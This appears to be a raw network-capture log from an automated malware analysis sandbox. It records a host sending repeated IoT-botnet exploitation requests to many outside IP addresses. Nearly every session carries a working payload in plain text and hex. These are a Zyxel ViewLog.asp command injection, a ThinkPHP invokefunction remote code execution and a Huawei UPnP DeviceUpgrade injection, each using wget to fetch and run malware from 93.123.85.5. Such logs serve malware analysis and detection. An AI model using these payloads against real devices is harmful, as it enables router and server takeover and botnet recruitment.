                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              602192.168.2.235553894.120.154.468080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:38.239507914 CET12117OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              603192.168.2.235313894.187.181.558080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:38.334813118 CET12123OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              604192.168.2.234973485.31.62.58080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:38.542103052 CET12135OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              605192.168.2.233312862.53.207.238080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:38.545999050 CET12136OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:38.856887102 CET12211INHTTP/1.1 404 Not Found
                                                              Server: nPerf/2.2.7 2022-10-14
                                                              Connection: close
                                                              Content-Type: text/html; charset=utf8
                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 62 72 20 2f 3e 3c 2f 70 3e 3c 70 3e 6e 50 65 72 66 53 65 72 76 65 72 20 76 32 2e 32 2e 37 20 32 30 32 32 2d 31 30 2d 31 34 3c 2f 70 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.<br /></p><p>nPerfServer v2.2.7 2022-10-14</p></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              606192.168.2.235795262.149.5.2338080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:38.571933985 CET12136OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              607192.168.2.234770295.110.149.21080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:38.800749063 CET12149OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:19:39.124205112 CET12214INHTTP/1.1 400 Bad Request
                                                              Server: nginx
                                                              Date: Mon, 13 Nov 2023 21:19:38 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 150
                                                              Connection: close
                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              608192.168.2.235658688.221.127.14580
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:39.418750048 CET12251OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:19:39.713936090 CET12255INHTTP/1.0 400 Bad Request
                                                              Server: AkamaiGHost
                                                              Mime-Version: 1.0
                                                              Content-Type: text/html
                                                              Content-Length: 257
                                                              Expires: Mon, 13 Nov 2023 21:19:39 GMT
                                                              Date: Mon, 13 Nov 2023 21:19:39 GMT
                                                              Connection: close
                                                              Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 33 34 36 31 31 33 30 32 26 23 34 36 3b 31 36 39 39 39 31 30 33 37 39 26 23 34 36 3b 36 64 32 32 61 66 39 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                              Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;34611302&#46;1699910379&#46;6d22af9</BODY></HTML>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              609192.168.2.235282888.116.157.2680
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:39.464502096 CET12252OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:19:39.811400890 CET12276INHTTP/1.1 400 Bad Request
                                                              Date: Mon, 13 Nov 2023 21:19:39 GMT
                                                              Server: Apache
                                                              X-Frame-Options: SAMEORIGIN
                                                              Content-Security-Policy: frame-ancestors 'self'
                                                              X-XSS-Protection: 1; mode=block
                                                              Content-Length: 226
                                                              Connection: close
                                                              Content-Type: text/html; charset=iso-8859-1
                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              61192.168.2.234981488.43.108.3580
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:17.635317087 CET2239OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:18:17.961651087 CET2324INHTTP/1.1 400 Bad Request
                                                              Content-Type: text/html; charset=us-ascii
                                                              Server: Microsoft-HTTPAPI/2.0
                                                              Date: Mon, 13 Nov 2023 21:18:17 GMT
                                                              Connection: close
                                                              Content-Length: 311
                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              610192.168.2.2351286197.56.85.23237215
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:39.758537054 CET12275OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                              Content-Length: 430
                                                              Connection: keep-alive
                                                              Accept: */*
                                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 33 2e 31 32 33 2e 38 35 2e 35 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 6d 69 70 73 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 93.123.85.5 -l /tmp/binary -r /mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary mips)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                              Nov 13, 2023 22:19:40.134202003 CET12362INHTTP/1.1 500 Internal Server Error
                                                              Content-Type: text/xml; charset="utf-8"
                                                              Server: Linux UPnP/1.0 Huawei-ATP-IGD
                                                              EXT:
                                                              Connection: Keep-Alive
                                                              Content-Length: 398


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              611192.168.2.233464494.187.116.2388080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:40.269097090 CET12367OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              612192.168.2.234081094.120.41.1408080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:40.270210028 CET12368OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              613192.168.2.234262494.120.13.1138080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:40.270715952 CET12368OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              614192.168.2.233337031.136.246.258080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:40.597440004 CET12371OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:41.608197927 CET12496OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:43.591974020 CET12736OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:47.783365011 CET13338OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:55.718442917 CET14300OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:11.588252068 CET16302OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:44.095964909 CET20341OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              615192.168.2.234900631.136.113.2078080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:40.597640991 CET12372OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
